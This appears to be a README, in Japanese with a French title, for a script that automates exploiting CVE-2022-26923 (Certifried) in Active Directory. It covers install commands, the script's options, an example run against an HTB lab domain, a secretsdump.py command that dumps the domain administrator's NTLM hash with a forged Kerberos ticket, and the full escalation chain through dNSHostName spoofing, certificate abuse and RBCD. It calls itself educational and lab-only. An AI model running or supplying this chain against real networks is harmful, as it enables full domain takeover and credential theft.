
Exploitation de CVE-2022-26923
CVE-2022-26923 (Certifried) の悪用を自動化し、Active Directory Certificate Services (AD CS) と Resource-Based Constrained Delegation (RBCD) を悪用した特権昇格を可能にし、ドメイン管理者アカウントの NTLM ハッシュのダンプを実現します。
⚠️ 教育目的のみ / Lab / HTB
許可されていない環境では使用しないでください。
このスクリプトは以下の攻撃チェーンを自動化します:
dNSHostName の変更administrator の Kerberos チケット取得secretsdump.py による NTLM ダンプcertipy-adbloodyADgetST.py (Impacket)secretsdump.py (Impacket)opensslpipx install impacket
pipx install certipy-ad
pipx install bloodyad
sudo apt install openssl
chmod +x CVE-2022-26923.sh
./CVE-2022-26923.sh [options]
-d, --dc-ip IP du Domain Controller
-D, --domain Nom du domaine
-u, --user Utilisateur valide
-p, --pass Mot de passe utilisateur
-c, --comp-name Nom machine contrôlée
-C, --comp-pass Mot de passe machine
-a, --ca-name Nom du Certificate Authority
-t, --template Template certificat
-f, --pfx-file Nom fichier PFX
-H, --dc-hostname Hostname du DC
-A, --dc-account Compte DC
-i, --impersonate Compte cible à impersonner
--verbose Mode debug
-h, --help Aide
./CVE-2022-26923.sh \
-d 10.129.1.39 \
-D certifried.htb \
-u [email protected] \
-p 'Ch4ng3m3!' \
--verbose
実行終了時:
administrator.ccacheadministrator アカウントの NTLM ダンプKerberos の問題が発生した場合:
KRB5CCNAME=/tmp/administrator.ccache secretsdump.py \
-just-dc-ntlm -just-dc-user administrator \
certifried.htb/[email protected] \
-k -no-pass -dc-ip 10.129.1.39
Machine Account Creation
↓
dNSHostName spoofing
↓
Certificate Request (Machine Template)
↓
Authentication via PFX
↓
RBCD abuse (bloodyAD)
↓
S4U2Self + S4U2Proxy
↓
Kerberos Ticket extraction
↓
NTLM dump via secretsdump
このプロジェクトは以下の目的で提供されています:
作者は許可されていない使用について一切の責任を負いません。
MIT